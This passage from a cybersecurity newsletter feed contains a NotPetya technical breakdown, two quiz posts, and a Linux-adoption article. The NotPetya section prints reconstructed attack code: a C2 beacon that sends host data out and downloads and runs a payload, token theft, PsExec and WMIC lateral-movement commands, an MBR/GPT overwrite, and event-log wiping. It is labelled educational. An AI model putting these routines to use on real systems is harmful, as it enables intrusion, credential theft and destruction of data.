It acts as a passive monitoring system that alerts admins when there is a potential breach.</p></li></ul>]]></content:encoded></item><item><title><![CDATA[Technical Breakdown of NotPetya]]></title><description><![CDATA[How a nation-state cyber weapon disguised as ransomware wiped over $10 billion from the global economy in a single day]]></description><link>https://emilianocybersec.substack.com/p/technical-breakdown-of-notpetya</link><guid isPermaLink="false">https://emilianocybersec.substack.com/p/technical-breakdown-of-notpetya</guid><dc:creator><![CDATA[Emiliano L. Compassi]]></dc:creator><pubDate>Wed, 25 Feb 2026 21:20:37 GMT</pubDate><enclosure url="https://substack-post-media.s3.amazonaws.com/public/images/41ac718f-0885-4821-8f8f-0a6e1fb805e4_732x432.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>On June 27, 2017, malware began spreading from Ukrainian accounting software and tore through the networks of multinationals, hospitals, and shipping firms across 60+ countries. It looked like ransomware. It wasn&#8217;t. 
This is a technical breakdown of how NotPetya worked.</p><div><hr></div><h2>Phase 1: Supply Chain Compromise (Initial Access)</h2><p>The attackers (attributed technically via malware lineage and infrastructure overlap, and formally named as GRU Sandworm, Unit 74455, by US, UK, Australian, and Canadian intelligence; no public cryptographic proof has been released) compromised M.E.Doc, a Ukrainian accounting app with ~400,000 customers, and planted a backdoor inside the legitimate updater module (<code>ZvitPublishedObjects.dll</code>) as early as April 2017. The backdoor beaconed to a C2 server, received the NotPetya payload, and executed it silently. Exfiltrated organisation data was hidden in a Cookie header disguised as Google Analytics traffic.</p><p><em>All code blocks below are pseudocode-style reconstructions: the logic is accurate, but the primitives are incomplete and the code is non-operational.</em></p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;python&quot;,&quot;nodeId&quot;:&quot;7b43ee47-2893-4cdd-bff5-f4ca75e50cfb&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-python"># Illustrative reconstruction based on ESET and Cisco Talos analysis
# of ZvitPublishedObjects.dll

import os, subprocess, requests, base64, winreg, sqlite3

def get_org_identifier():
    try:
        conn = sqlite3.connect("C:\\MeDoc\\Data\\medoc.db")
        row = conn.cursor().execute(
            "SELECT edrpou FROM org_settings LIMIT 1"
        ).fetchone()
        return row[0] if row else "unknown"
    except Exception:
        return "unknown"

def get_proxy_config():
    try:
        key = winreg.OpenKey(
            winreg.HKEY_CURRENT_USER,
            r"Software\Microsoft\Windows\CurrentVersion\Internet Settings"
        )
        return winreg.QueryValueEx(key, "ProxyServer")[0]
    except Exception:
        return None

def beacon(c2_host: str):
    host_info = {
        "edrpou": get_org_identifier(),
        "host":   os.environ.get("COMPUTERNAME", ""),
        "domain": os.environ.get("USERDOMAIN", ""),
        "user":   os.environ.get("USERNAME", ""),
    }
    encoded = base64.b64encode(str(host_info).encode()).decode()

    proxy = get_proxy_config()
    proxies = {"http": f"http://{proxy}", "https": f"http://{proxy}"} if proxy else {}

    headers = {
        "User-Agent": "medoc_ua/10.01.175",
        "Cookie": f"_ga={encoded}; _gat=1"  # exfil disguised as GA cookie
    }

    try:
        resp = requests.get(
            f"http://{c2_host}/Index.php",
            headers=headers, proxies=proxies, timeout=10
        )
        if resp.status_code == 200 and len(resp.content) &gt; 512:
            payload_path = os.path.join(
                os.environ.get("WINDIR", "C:\\Windows"), "perfc.dat"
            )
            with open(payload_path, "wb") as f:
                f.write(resp.content)
            subprocess.Popen(
                ["rundll32.exe", payload_path, "#1"],
                creationflags=0x08000000  # CREATE_NO_WINDOW
            )
    except Exception:
        pass  # silent, retries on next update cycle</code></pre></div><p>The victim installed the weapon themselves.</p><div><hr></div><h2>Phase 2: Privilege Escalation and Credential Theft</h2><p><code>perfc.dat</code> carried both a 32-bit and 64-bit Mimikatz module as embedded <code>RT_RCDATA</code> resources, written to disk as <code>dllhost.dat</code> and executed. Credentials were piped back to the parent process in memory. It also enumerated all active sessions and duplicated their tokens, letting it impersonate logged-in domain admins without cracking a single hash.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;3af252f1-cbcb-4507-87a6-8e365b04cc73&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">// Illustrative reconstruction based on CrowdStrike and LogRhythm analysis

#include &lt;windows.h&gt;
#include &lt;tlhelp32.h&gt;

BOOL EnableDebugPrivilege() {
    HANDLE hToken;
    TOKEN_PRIVILEGES tp = {0};

    if (!OpenProcessToken(GetCurrentProcess(),
                          TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &amp;hToken))
        return FALSE;

    LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &amp;tp.Privileges[0].Luid);
    tp.PrivilegeCount = 1;
    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    BOOL result = AdjustTokenPrivileges(hToken, FALSE, &amp;tp, sizeof(tp), NULL, NULL);
    CloseHandle(hToken);
    return result &amp;&amp; (GetLastError() == ERROR_SUCCESS);
}

void HarvestSessionTokens(HANDLE *tokenBuffer, DWORD *tokenCount) {
    *tokenCount = 0;
    HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hSnap == INVALID_HANDLE_VALUE) return;

    PROCESSENTRY32W pe = { sizeof(pe) };
    if (!Process32FirstW(hSnap, &amp;pe)) { CloseHandle(hSnap); return; }

    do {
        HANDLE hProc = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, pe.th32ProcessID);
        if (!hProc) continue;

        HANDLE hToken;
        if (OpenProcessToken(hProc,
                              TOKEN_DUPLICATE | TOKEN_QUERY | TOKEN_IMPERSONATE,
                              &amp;hToken)) {
            DWORD sessionId = 0, dwLen = 0;
            GetTokenInformation(hToken, TokenSessionId,
                                &amp;sessionId, sizeof(DWORD), &amp;dwLen);

            if (sessionId &gt; 0) {  // only elevated/active sessions
                HANDLE hDupToken;
                if (DuplicateTokenEx(hToken, TOKEN_ALL_ACCESS, NULL,
                                      SecurityImpersonation, TokenPrimary,
                                      &amp;hDupToken))
                    tokenBuffer[(*tokenCount)++] = hDupToken;
            }
            CloseHandle(hToken);
        }
        CloseHandle(hProc);
    } while (Process32NextW(hSnap, &amp;pe) &amp;&amp; *tokenCount &lt; 64);

    CloseHandle(hSnap);
}

// Each harvested token is injected into a suspended thread,
// which then executes the SMB copy + remote execution as that user.
void ImpersonateAndSpread(HANDLE hToken, const char *targetIP) {
    HANDLE hThread = CreateThread(NULL, 0, LateralMovementThread,
                                   (LPVOID)targetIP, CREATE_SUSPENDED, NULL);
    SetThreadToken(&amp;hThread, hToken);
    ResumeThread(hThread);
    WaitForSingleObject(hThread, 30000);
    CloseHandle(hThread);
}</code></pre></div><div><hr></div><h2>Phase 3: Lateral Movement via EternalBlue and Credential Abuse</h2><p>Two propagation paths ran simultaneously. The dual-channel design is why even a network at 97% MS17-010 patch coverage got wiped.</p><p><strong>Method 1: EternalBlue (CVE-2017-0144)</strong></p><p>NotPetya enumerated targets quietly, reading the ARP cache and TCP connection table rather than port scanning, then fired EternalBlue at any host with 445 open.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;python&quot;,&quot;nodeId&quot;:&quot;72648974-a533-49bb-8e98-28d8450315bd&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-python"># Illustrative reconstruction based on CrowdStrike and ESET analysis

import ctypes, socket, struct, ipaddress

def get_arp_targets():
    iphlpapi = ctypes.windll.iphlpapi
    buf_size  = ctypes.c_ulong(0)
    iphlpapi.GetIpNetTable(None, ctypes.byref(buf_size), False)
    buf = ctypes.create_string_buffer(buf_size.value)

    if iphlpapi.GetIpNetTable(buf, ctypes.byref(buf_size), False) != 0:
        return []

    num_entries = struct.unpack_from("I", buf.raw, 0)[0]
    targets, offset = [], 4  # skip dwNumEntries

    for _ in range(num_entries):
        # MIB_IPNETROW: 24 bytes, IP addr at offset +16
        ip_int = struct.unpack_from("&lt;I", buf.raw, offset + 16)[0]
        targets.append(socket.inet_ntoa(struct.pack("&lt;I", ip_int)))
        offset += 24

    return list(set(targets))

def build_sweep_targets():
    seen = set(get_arp_targets())
    for local_ip in get_local_interface_ips():
        net = ipaddress.IPv4Network(f"{local_ip}/24", strict=False)
        for host in net.hosts():
            seen.add(str(host))
    return list(seen)

def check_smb_reachable(ip: str) -&gt; bool:
    for port in (445, 139):
        try:
            with socket.create_connection((ip, port), timeout=0.75):
                return True
        except OSError:
            pass
    return False</code></pre></div><p><strong>Method 2: Credential-based SMB + PsExec / WMIC</strong></p><p>For patched hosts, every harvested credential pair was tried against <code>Admin$</code>. On success, <code>perfc.dat</code> was copied across and executed remotely: PsExec first, WMIC as a fallback.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;662798d0-f9df-4c59-b485-691d67a8bb58&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">// Illustrative reconstruction of the Admin$ write + remote execution

#include &lt;windows.h&gt;
#include &lt;winnetwk.h&gt;

BOOL PropagateViaCreds(const char *targetIP,
                        const char *username,
                        const char *password,
                        const char *domain) {

    char adminShare[MAX_PATH], fullUser[256];
    snprintf(adminShare, MAX_PATH, "\\\\%s\\Admin$", targetIP);

    if (domain &amp;&amp; strlen(domain) &gt; 0)
        snprintf(fullUser, 256, "%s\\%s", domain, username);
    else
        strncpy(fullUser, username, 256);

    NETRESOURCE nr = {0};
    nr.dwType       = RESOURCETYPE_DISK;
    nr.lpRemoteName = adminShare;

    if (WNetAddConnection2(&amp;nr, password, fullUser, 0) != NO_ERROR)
        return FALSE;

    char destPath[MAX_PATH];
    snprintf(destPath, MAX_PATH, "\\\\%s\\Admin$\\perfc.dat", targetIP);
    if (!CopyFile("C:\\Windows\\perfc.dat", destPath, FALSE)) {
        WNetCancelConnection2(adminShare, 0, TRUE);
        return FALSE;
    }

    // Primary: PsExec (embedded as dllhost.dat, dropped during init)
    char cmd[512];
    snprintf(cmd, 512,
        "C:\\Windows\\dllhost.dat \\\\%s -accepteula -s -d "
        "C:\\Windows\\System32\\rundll32.exe "
        "\"C:\\Windows\\perfc.dat\",#1 18",
        targetIP);
    WinExec(cmd, SW_HIDE);

    // Fallback: WMIC remote process creation
    snprintf(cmd, 512,
        "wmic /node:\"%s\" /user:\"%s\" /password:\"%s\" "
        "process call create "
        "\"C:\\Windows\\System32\\rundll32.exe C:\\Windows\\perfc.dat,#1\"",
        targetIP, fullUser, password);
    WinExec(cmd, SW_HIDE);

    WNetCancelConnection2(adminShare, 0, TRUE);
    return TRUE;
}</code></pre></div><p>Microsoft&#8217;s post-incident analysis found that credential-based propagation caused <em>more</em> spread than EternalBlue. Organisations had patched MS17-010 after <a href="https://en.wikipedia.org/wiki/WannaCry_ransomware_attack">WannaCry</a>. They hadn&#8217;t fixed over-privileged service accounts with tokens cached across every host in the domain.</p><div><hr></div><h2>Phase 4: MBR Overwrite and Scheduled Destruction</h2><p>This is the phase that proved it was never ransomware. NotPetya obtained a raw write handle to <code>\\.\PhysicalDrive0</code>, overwrote the MBR with a malicious bootloader, then scheduled a forced reboot ~60 minutes out, giving propagation time to complete first.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;bb5f7593-46d2-4a2b-a2f3-b94f1cc42fd9&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">// Illustrative reconstruction based on LogRhythm Labs binary analysis

#include &lt;windows.h&gt;

// Malicious bootloader: a 512-byte x86 real-mode blob stored as an
// embedded RT_RCDATA resource in perfc.dat and extracted at runtime.
extern unsigned char malicious_bootloader[512];

BOOL OverwriteMBR() {
    HANDLE hDisk = CreateFile(
        "\\\\.\\PhysicalDrive0",
        GENERIC_READ | GENERIC_WRITE,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL, OPEN_EXISTING, 0, NULL
    );
    if (hDisk == INVALID_HANDLE_VALUE) return FALSE;

    DWORD written;

    // Sector 0: overwrite the 512-byte MBR
    SetFilePointer(hDisk, 0, NULL, FILE_BEGIN);
    WriteFile(hDisk, malicious_bootloader, 512, &amp;written, NULL);

    // Sectors 1&#8211;34: destroy GPT header + backup GPT
    // Ensures UEFI/GPT systems are unrecoverable, not just legacy MBR disks
    for (DWORD sector = 1; sector &lt;= 34; sector++) {
        LARGE_INTEGER offset;
        offset.QuadPart = (LONGLONG)sector * 512;
        SetFilePointerEx(hDisk, offset, NULL, FILE_BEGIN);
        WriteFile(hDisk, malicious_bootloader, 512, &amp;written, NULL);
    }

    CloseHandle(hDisk);
    return (written == 512);
}

void ScheduleReboot() {
    SYSTEMTIME st;
    GetLocalTime(&amp;st);

    int delayMinutes = 60;
    int hour   = (st.wHour + ((st.wMinute + delayMinutes) / 60)) % 24;
    int minute = (st.wMinute + delayMinutes) % 60;

    char cmd[256];

    // Vista+: schtasks under SYSTEM
    snprintf(cmd, 256,
        "cmd.exe /c schtasks /RU \"SYSTEM\" /Create /SC once /TN \"\" "
        "/TR \"shutdown.exe /r /f\" /ST %02d:%02d", hour, minute);
    WinExec(cmd, SW_HIDE);

    // XP fallback: AT command
    snprintf(cmd, 256,
        "cmd.exe /c at %02d:%02d shutdown.exe /r /f", hour, minute);
    WinExec(cmd, SW_HIDE);
}</code></pre></div><p>On reboot, the bootloader displayed a fake <code>CHKDSK</code> screen while Salsa20-encrypting the MFT in the background. With the MFT gone, the filesystem was unaddressable.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:&quot;a0dd241d-168d-4bcd-9d06-2e1a40e9041e&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">Repairing file system on C:
The type of the file system is NTFS.
Volume label is .

WARNING! F parameter not specified.
Running CHKDSK in read-only mode.
                                       [ 34% complete ]

# What was actually happening:
# Salsa20 encryption of MFT at \\.\PhysicalDrive0 offsets 0x0&#8211;0x4000
# Key derived locally, never transmitted. No recovery path.</code></pre></div><p>The ransom note that followed was theatrical. The contact email (<code>wowsmith123456@posteo.net</code>) was shut down by Posteo within hours. There was never a decryption mechanism; the key was generated and immediately discarded.</p><div><hr></div><h2>Phase 5: Anti-Forensic Cleanup</h2><p>Before the reboot triggered, NotPetya wiped Windows event logs, erasing the execution trail, credential theft, and lateral movement chain.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;ba92e2e7-a1f0-4998-931f-4738aa45fe3c&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">#include &lt;windows.h&gt;

void ClearEventLogs() {
    const char *channels[] = {
        "System", "Security", "Application",
        "Microsoft-Windows-TaskScheduler/Operational",
        NULL
    };
    for (int i = 0; channels[i]; i++) {
        HANDLE hLog = OpenEventLog(NULL, channels[i]);
        if (hLog) {
            ClearEventLog(hLog, NULL);  // NULL = discard, no backup
            CloseEventLog(hLog);
        }
    }
}</code></pre></div><p>The log wipe was technically redundant; the disk was being destroyed moments later anyway. Microsoft flagged it as an indicator of either ingrained nation-state tradecraft or evidence that NotPetya was the cleanup layer over a separate, quieter operation that investigators never fully reconstructed.</p><p>NotPetya also fingerprinted running AV processes (Kaspersky, Symantec, Norton) and adjusted its remote execution path accordingly before propagating.</p><div><hr></div><h2>The Damage</h2><p>$10 billion in global losses. Maersk: 45,000 PCs, 4,000 servers, 2,500 applications reinstalled across 130 countries in 10 days, $300 million lost. Merck: $870 million. FedEx: $400 million. Saint-Gobain: $384 million. Mondel&#275;z: $190 million.</p><p>NotPetya also hit Rosneft and Evraz, two Russian state-owned enterprises, either collateral damage or deliberate deniability engineering. In February 2018, the US, UK, Australian, and Canadian governments formally attributed the attack to Sandworm, GRU Unit 74455. No other single cyber operation has simultaneously targeted private industry at this scale while serving a clear geopolitical objective and done so with a weapon that offered victims no recovery path by design.</p><div><hr></div><h2>Disclaimer &amp; Methodology</h2><p>This article is intended for <strong>educational</strong> and <strong>defensive research</strong> purposes <strong>only</strong>. All code snippets are <strong>illustrative reconstructions</strong> based on published analyses from CrowdStrike, LogRhythm Labs, ESET, Cisco Talos, and Microsoft. 
They are deliberately incomplete and non-operational; no working exploit code, shellcode, or bootloader payload is included.</p><p>Nothing in this article should be interpreted as a step-by-step guide or used against systems without explicit authorisation.</p><div><hr></div><h2>Sources</h2><p><a href="https://www.crowdstrike.com/en-us/blog/petrwrap-ransomware-technical-analysis-triple-threat-file-encryption-mft-encryption-credential-theft/">CrowdStrike Triple Threat Analysis</a> | <a href="https://www.cvedetails.com/cve/CVE-2017-0144/">CVE-2017-0144 (EternalBlue)</a></p><p><a href="https://www.microsoft.com/en-us/security/blog/2018/02/05/overview-of-petya-a-rapid-cyberattack/">Microsoft Security Blog Petya Kill Chain</a> | <a href="https://gallery.logrhythm.com/threat-intelligence-reports/notpetya-technical-analysis-logrhythm-labs-threat-intelligence-report.pdf">LogRhythm Labs NOTPETYA Technical Analysis</a></p><p><a href="https://www.eset.com">ESET Research M.E.Doc Backdoor Analysis</a> | <a href="https://blog.talosintelligence.com">Cisco Talos Backdoor Timeline</a></p><p><a href="https://en.wikipedia.org/wiki/2017_Ukraine_ransomware_attacks">Wikipedia &#8212; 2017 Ukraine Ransomware Attacks</a> | <a 
href="https://www.sipa.columbia.edu/sites/default/files/2022-11/NotPetya%20Final.pdf">Columbia SIPA Case Study</a></p>]]></content:encoded></item><item><title><![CDATA[Daily Cyber Quiz]]></title><description><![CDATA[Answer revealed tomorrow...]]></description><link>https://emilianocybersec.substack.com/p/daily-cyber-quiz-60c</link><guid isPermaLink="false">https://emilianocybersec.substack.com/p/daily-cyber-quiz-60c</guid><dc:creator><![CDATA[Emiliano L. Compassi]]></dc:creator><pubDate>Wed, 25 Feb 2026 14:02:42 GMT</pubDate><enclosure url="https://substack-post-media.s3.amazonaws.com/public/images/6b3baffd-f6eb-4eb7-baf2-6423f51dead5_5760x3840.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="poll-embed" data-attrs="{&quot;id&quot;:453827}" data-component-name="PollToDOM"></div><p>Yesterday&#8217;s Answer: Bell-LaPadula</p><ul><li><p>The Bell-LaPadula model is specifically designed to enforce access control in systems where confidentiality is the main concern, such as government or military applications.</p></li></ul>]]></content:encoded></item><item><title><![CDATA[Daily Cyber Quiz]]></title><description><![CDATA[Answer revealed tomorrow...]]></description><link>https://emilianocybersec.substack.com/p/daily-cyber-quiz-248</link><guid isPermaLink="false">https://emilianocybersec.substack.com/p/daily-cyber-quiz-248</guid><dc:creator><![CDATA[Emiliano L. 
Compassi]]></dc:creator><pubDate>Tue, 24 Feb 2026 14:02:34 GMT</pubDate><enclosure url="https://substack-post-media.s3.amazonaws.com/public/images/253af678-42e7-4562-8ae2-4503ff03355a_5760x3840.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="poll-embed" data-attrs="{&quot;id&quot;:453826}" data-component-name="PollToDOM"></div><p>Yesterday&#8217;s Answer: SSH (Secure Shell)</p><ul><li><p>Unlike Telnet, FTP, and HTTP, which transmit data in plaintext, SSH provides a secure encrypted connection for remote access to a system.</p></li></ul>]]></content:encoded></item><item><title><![CDATA[Is It Finally The Year Of The Linux Desktop?]]></title><description><![CDATA[The joke has been running since 1998. But this time, the data looks different.]]></description><link>https://emilianocybersec.substack.com/p/is-it-finally-the-year-of-the-linux</link><guid isPermaLink="false">https://emilianocybersec.substack.com/p/is-it-finally-the-year-of-the-linux</guid><dc:creator><![CDATA[Emiliano L. Compassi]]></dc:creator><pubDate>Mon, 23 Feb 2026 17:11:17 GMT</pubDate><enclosure url="https://substack-post-media.s3.amazonaws.com/public/images/83009283-1e5b-4779-a4bd-c11ec9e8f1ed_5184x3888.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>For as long as anyone in the open-source world can remember, every year has been declared &#8216;the year of the Linux desktop&#8217;, and every year, it hasn&#8217;t been. The phrase mutated from a sincere prediction to a running joke. 
Linux dominated servers, cloud infrastructure, Android, embedded systems, and supercomputers, while somehow never quite making it onto ordinary people&#8217;s desktops. Windows kept its stranglehold, and the joke persisted.</p><p>But something changed around 2025. The numbers started moving in ways they haven&#8217;t moved before, and the reason wasn&#8217;t that Linux suddenly got dramatically better overnight. It&#8217;s that Microsoft made Windows substantially worse. Let&#8217;s actually look at what&#8217;s happening, because this time the data is worth taking seriously.</p><div><hr></div><h2><strong>The Numbers</strong></h2><p>Linux&#8217;s desktop market share globally stood at <strong>2.76%</strong> in July 2022. By the end of 2025, StatCounter puts it at <strong>4.7%</strong> worldwide, a 70% increase in three years. In the United States specifically, Linux crossed the <strong>5% threshold for the first time in June 2025</strong>, hitting 5.03% according to StatCounter data. The US Digital Analytics Program, which tracks the operating systems of visitors to federal government websites, recorded <strong>that 6% of visitors were running Linux</strong> as of August 2025.</p><p>To put that growth trajectory in perspective: it took Linux two decades to reach 1% desktop market share in 2011, then another decade to reach 2%. 
Going from roughly 2% to nearly 5% in three years is unprecedented.</p><div class="captioned-image-container"><figure><img src="https://substackcdn.com/image/fetch/$s_!n3xn!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0eb7b0b6-f865-4364-8eb0-153fc16908f4_1172x1074.png" width="602" height="551.6621160409557" class="sizing-normal" alt=""></figure></div><p>On <a href="https://en.wikipedia.org/wiki/Steam_(service)">Steam</a>, which matters because gaming has historically been one of the most stubborn barriers to Linux adoption, Linux hit an all-time high of <strong>3.20%</strong> of the platform&#8217;s user base in November 2025, up from 2.03% a year earlier. That&#8217;s a 57% year-over-year increase, representing approximately 4.2 million monthly active Linux gamers. Crucially, that growth is no longer just from Steam Deck owners. Data from the Steam survey shows that the share of Linux installs on SteamOS is declining, while Arch, Ubuntu, and gaming-focused distributions like CachyOS and Bazzite are increasing. People are going out of their way to install Linux on conventional hardware.</p><p>Among developers, Ubuntu remains a key indicator of wider desktop adoption. 
The Stack Overflow Developer Survey 2025 shows <strong>that 27.8% use Ubuntu</strong> for personal purposes and 27.7% for professional reasons, excluding WSL (Windows Subsystem for Linux).</p><div><hr></div><h2><strong>What Actually Drove This</strong></h2><h2><strong>The Windows 10 End-of-Life Cliff</strong></h2><p>The single largest catalyst was Microsoft&#8217;s decision to end Windows 10 support on <strong>October 14, 2025</strong>. This alone created a migration moment affecting hundreds of millions of machines, and Microsoft ensured a significant portion couldn&#8217;t follow the &#8216;obvious&#8217; upgrade path.</p><p>Windows 11&#8217;s TPM 2.0 requirement locked out a massive installed base of otherwise perfectly functional hardware. A machine running an Intel 7th- or 8th-generation processor, hardware that was mainstream and mid-range as recently as 2019, cannot officially upgrade to Windows 11. Microsoft&#8217;s official message to those users was stark: buy new hardware, or be left without security updates. Zorin OS, one of several Linux distributions explicitly marketing itself to Windows refugees, reported that over <strong>780,000 Windows users had transitioned to Linux</strong> in the wake of the end-of-life announcements.</p><p>The TPM requirement wasn&#8217;t a neutral technical decision. It was a hardware-refresh driver wrapped in security rhetoric, and users understood it that way. A significant chunk chose a third option Microsoft hadn&#8217;t intended: leave Windows entirely.</p><h3><strong>Microsoft&#8217;s Alienation Campaign</strong></h3><p>Even among users with Windows 11-compatible hardware, 2025 became an extraordinary test of Microsoft&#8217;s ability to gauge exactly how much degradation users will tolerate before they leave. The company&#8217;s strategy throughout 2024&#8211;2025 was to position Windows 11 as an AI platform first and an operating system second. 
This manifested in a series of deeply unpopular decisions: Copilot integrations appearing in Notepad, Paint, File Explorer, and Edge, many of which required cloud connectivity and data transmission to be useful at all. Windows Recall, a feature that would screenshot and index everything you do on your PC, launched to a wave of privacy and security criticism so severe that Microsoft was forced to delay it by an entire year while it addressed fundamental security flaws. When Windows president Pavan Davuluri publicly announced that Windows would evolve into an &#8216;agentic OS,&#8217; the backlash was so overwhelming that he was forced to disable replies to the post and issue a clarifying statement.</p><p>Windows Latest compiled a list of 20 major Windows 11 update bugs in 2025 alone. The Microsoft 365 Personal subscription price increased to $9.99 per month to cover the inclusion of mandatory AI features, up from $6.99. Community tools like Flyoobe emerged specifically to bypass Windows 11&#8217;s hardware requirements and surgically remove AI integrations during installation. The term &#8216;Microslop&#8217; trended on social media. By January 2026, Microsoft had conceded ground, announcing plans to strip back Copilot from Notepad and Paint, pause new Copilot integrations, and reconsider the entire direction of Windows Recall. Internal leaks suggest the company is now describing Windows 11&#8217;s situation as requiring a &#8216;Windows 8.1 moment&#8217;, a soft reboot to recover from a catastrophic misjudgement of what users actually want. That&#8217;s a remarkable admission for the dominant desktop OS vendor. Windows actively drove users to look for alternatives, rather than Linux simply attracting them.</p><h3><strong>The Raw Performance Argument</strong></h3><p>There&#8217;s a pull factor that often gets overlooked in these discussions: Linux is simply faster on the same hardware. 
Windows 11&#8217;s background processes, telemetry services, Copilot integrations, and mandatory update infrastructure consume a non-trivial amount of system resources at idle. A machine running a lean Linux distribution, such as Ubuntu, Fedora, or especially Arch, will typically show lower RAM usage, lower CPU overhead at idle, and faster boot times on identical hardware. This is the kind of difference you feel daily on a mid-range machine.</p><p>The effect is most pronounced on AMD hardware, which has particularly strong open-source driver support on Linux. AMD&#8217;s GPU and APU drivers are developed in close collaboration with the Linux kernel community, ensuring a tightly integrated, well-optimised driver stack. On a machine with an AMD Ryzen processor and Radeon graphics, Linux isn&#8217;t just lighter; it can match or even surpass Windows in raw performance workloads. The Steam Deck benchmarks are illustrative: when LTT tested SteamOS against Windows 10 on the Deck&#8217;s AMD APU hardware, SteamOS outperformed Windows in all three games tested, hitting 34fps versus 19fps in Hitman 3 and 60fps versus 47fps in Doom Eternal.</p><p>For users with older hardware that can&#8217;t meet Windows 11&#8217;s TPM 2.0 requirement, this performance advantage is even more compelling. A five-year-old machine that Windows has effectively abandoned can often feel noticeably faster running a modern Linux distribution than it did running Windows 10. That&#8217;s a powerful argument for anyone facing the choice between buying new hardware to run Windows 11 or simply installing Linux on what they already own.</p><h3><strong>Valve&#8217;s Trojan Horse</strong></h3><p>On the gaming side, the pull factor is Valve&#8217;s quiet, multi-year project to make Linux a first-class gaming platform. The Steam Deck, launched in 2022, shipped approximately <strong>5.6 million units by mid-2025</strong> and runs SteamOS, an Arch Linux-based OS, out of the box. 
Every Steam Deck is essentially a Linux desktop in someone&#8217;s hands, often belonging to someone who has never considered operating systems before. But more important than the hardware is the software. <strong><a href="https://en.wikipedia.org/wiki/Proton_(software)">Proton</a></strong>, Valve&#8217;s compatibility layer, now lets around <strong>90% of Windows games run on Linux</strong> without any changes. The Deck Verified programme has approved over 21,000 games for SteamOS. Proton 10.0 was released in 2025 with VKD3D-Proton 3.0 support, introducing AMD FSR 4 and substantial improvements to the shader backend. The main remaining obstacle, online multiplayer games with kernel-level anti-cheat systems (EAC, BattlEye), is shrinking but not yet gone.</p><p>In 2025, Valve also expanded official SteamOS support to third-party handhelds, including the Lenovo Legion Go S and ASUS ROG Ally, and announced the upcoming Steam Machine and Steam Frame. SteamOS is no longer just for the Steam Deck. Valve is gradually developing a Linux gaming ecosystem that features a level of vertical integration and refinement that Linux gaming has not experienced before.</p><div><hr></div><h2><strong>The Security Aspect</strong></h2><p><a href="https://en.wikipedia.org/wiki/Windows_Recall">Windows Recall</a>&#8217;s fundamental architecture is a continuously running screenshot service that OCRs and indexes your screen. It alarmed security researchers not because the implementation was flawed (though it was), but because the concept creates a single, searchable database of everything you&#8217;ve ever done on your machine. Even after Microsoft&#8217;s revisions, the feature remains a soft target for any malware that achieves local code execution. The attack surface is obvious: compromise the process, gain access to months of screen history. 
More broadly, Windows 11&#8217;s increasing cloud dependency, with AI features that require data transmission to Microsoft&#8217;s servers to function, creates data exposure vectors that simply don&#8217;t exist on a locally-running Linux install.</p><p>For security-conscious users, developers, and professionals handling sensitive data, the control and transparency of a Linux environment have always had appeal. The difference now is that the cost of switching is dramatically lower than it was five years ago. The growing adoption of Linux among developers (nearly 28% on Ubuntu for personal use) has a downstream security benefit: more tooling, better documentation, and shorter paths from security research to actionable knowledge all flow from having a large and active Linux desktop user base.</p><div><hr></div><h2><strong>The Remaining Barriers</strong></h2><p>None of this means Linux is about to replace Windows. Let&#8217;s be clear about what&#8217;s still not solved. <strong>Anti-cheat</strong> is the largest gaming blocker. Titles using kernel-level anti-cheat on EasyAntiCheat or BattlEye require explicit developer opt-in for Proton support. Popular competitive games, such as Valorant, PUBG in some configurations, and some Call of Duty titles, remain inaccessible on Linux. For competitive gamers, this is a dealbreaker.</p><p><strong>Software compatibility</strong> still has gaps. Adobe Creative Suite has no native Linux support. The Microsoft Office ecosystem, while accessible via web apps and wine/compatibility layers, isn&#8217;t seamless for power users. For users in creative fields such as video editing, design, photography, and audio engineering, the software gap is significant enough that many won&#8217;t be moving to Linux at all. They&#8217;ll be heading to macOS. And in 2025, that switch became more economically viable than it has been in years. 
While tariffs on electronics raised initial costs, the fast expansion of AI data centres created additional pricing pressure by redirecting memory and advanced components away from consumer supply chains. This combination led many PC manufacturers to increase their prices, but Apple was positioned differently.</p><p>The company had negotiated long-term supply agreements with component manufacturers, diversified its supply chain aggressively into India (for iPhones) and Vietnam (for Macs and iPads), and used its enormous purchasing leverage to absorb costs competitors couldn&#8217;t. The result: Apple actually <em>cut</em> the price of the M4 MacBook Air by $100 at a time when comparable Windows laptops were getting more expensive. For a video editor or designer weighing a Mac against a Windows machine, the historical &#8216;Macs are too expensive&#8217; argument simply carries less weight when the price gap narrows. Not to mention that Apple Silicon Macs offer exceptional performance, battery life, and security posture.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" 